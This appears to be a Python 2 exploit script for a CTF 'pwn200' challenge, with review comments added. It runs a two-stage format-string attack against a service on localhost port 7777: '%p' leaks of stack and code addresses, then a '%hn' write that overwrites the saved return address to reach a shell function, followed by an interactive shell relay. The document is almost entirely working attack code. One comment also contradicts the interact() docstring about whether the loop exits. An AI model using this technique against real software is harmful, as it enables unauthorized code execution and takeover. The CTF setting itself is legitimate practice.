#DS CTF pwn200 exploit by Bartol
from socket import *
import time,re,struct,sys
def send_fstring(fstring,sock):
    # Send one round of input to the challenge service: a 63-byte field
    # carrying *fstring*, then the count "9", then nine numbers.
    # Args:
    #   fstring: text appended to the 'tan' prefix; the result is right-padded
    #            with 'A' to 63 bytes (ljust never truncates, so a longer
    #            payload is sent as-is).
    #   sock: connected socket, or anything exposing .send().
    # NOTE(review): indentation was lost in this paste; the nesting below
    # (sleep inside the loop, final "\n" after it) is a reconstruction --
    # confirm against the original gist.
    fullstring='tan'+fstring
    print ' * Sending: '+fullstring.ljust(63,"A")
    sock.send(fullstring.ljust(63,"A"))
    # Pacing delays -- presumably to let the remote side consume each field
    # before the next arrives.
    time.sleep(0.2)
    sock.send("9\n")
    for count in range(1,10):
        sock.send('-1111111111')
        time.sleep(0.1)
    # Presumably terminates the last number for the remote parser.
    sock.send("\n")
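def receive(sock):
    """Drain whatever the remote side has queued on *sock* and return it.

    Reads 4096-byte chunks until the peer closes the connection (an empty
    read) or no data arrives within the 0.2 s timeout.  A timeout is the
    normal way a read burst ends here, so it is reported but not raised;
    other socket errors (e.g. a reset after the remote process exits) are
    reported the same way so the caller keeps its best-effort flow.
    Unlike a bare ``except``, KeyboardInterrupt and programming errors now
    propagate instead of being mis-reported as a timeout.

    Args:
        sock: connected socket (anything with settimeout() and recv()).

    Returns:
        Everything read so far, possibly '' if nothing arrived.

    Side effect: leaves the 0.2 s timeout set on *sock*.
    """
    msg = ''
    sock.settimeout(0.2)  # bounds every recv() below
    try:
        chunk = sock.recv(4096)
        while chunk:  # '' means the peer closed the connection
            msg = msg + chunk
            chunk = sock.recv(4096)
    except timeout:
        print("Remote socket timeout..")
    except error as exc:
        # Keep what was read rather than aborting the whole session.
        print("Remote socket error: %s" % exc)
    return msg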
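def interact(sock):
    """Relay stdin lines to *sock* and print whatever comes back.

    Loops until stdin reaches EOF (readline() returns ''); without that
    check the loop spun forever at EOF, re-sending empty strings and
    waiting out receive()'s 0.2 s timeout on every pass.  Each round trip
    fetches the reply with receive(), so it waits that function's timeout.

    Args:
        sock: connected socket (anything with .send() usable by receive()).
    """
    while 1:
        command = sys.stdin.readline()
        if not command:
            # EOF on stdin: nothing left to relay; let the caller close sock.
            break
        sock.send(command)
        outp = receive(sock)
        print(outp)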
sock = socket(AF_INET, SOCK_STREAM)
# Connects to the challenge service on the local machine only.
sock.connect(('localhost', 7777))
print "Stage1..."
# Stage 1: the two %p conversions make the service print two pointers back
# between fixed marker strings; they are parsed out of the reply below.
send_fstring('StackLeak-->%4$p<--.TextLeak-->%31$p<--',sock)
outp=receive(sock)
# NOTE(review): re.search() returns None when a marker is absent (e.g. the
# reply timed out early), and .group(1) then raises AttributeError instead
# of a readable message.  The class [0-9A-z] also admits [\]^_` -- it
# relies on the leaked text being plain hex.
stackleak = re.search('StackLeak-->([0-9A-z]+?)<--', outp).group(1)
textleak = re.search('TextLeak-->([0-9A-z]+?)<--', outp).group(1)
print " * Stack leaked adress is: " + stackleak
print " * .text leaked address is: " + textleak
# int(..., 16) accepts the 0x prefix that %p output typically carries.
stackaddr=int(stackleak,16)
textaddr=int(textleak,16)
# Both offsets are constants specific to this challenge binary; nothing on
# this page lets them be re-derived.
saved_eip_addr=stackaddr+0x44#stack offset
shell_addr=textaddr+0x69#.text offset
print " * Saved EIP is at: 0x%x" % saved_eip_addr
print " * Shell func is at: 0x%x" % shell_addr
# Little-endian 32-bit encoding of the stack address.
saved_eip_addr_pack=struct.pack("<I",saved_eip_addr)
print "Stage2..."
# width is kept to 16 bits by the mask; 315 is an author-chosen adjustment
# that this page gives no way to verify.
width=(shell_addr-315) & 0xffff
send_fstring(saved_eip_addr_pack+"%"+str(width)+"p"+"%43$hn",sock)
outp=receive(sock)
print "Entering shell.."
# interact() is a while-1 loop with no exit, so close() below is never
# reached; the script is presumably stopped with Ctrl-C.
interact(sock)
sock.close()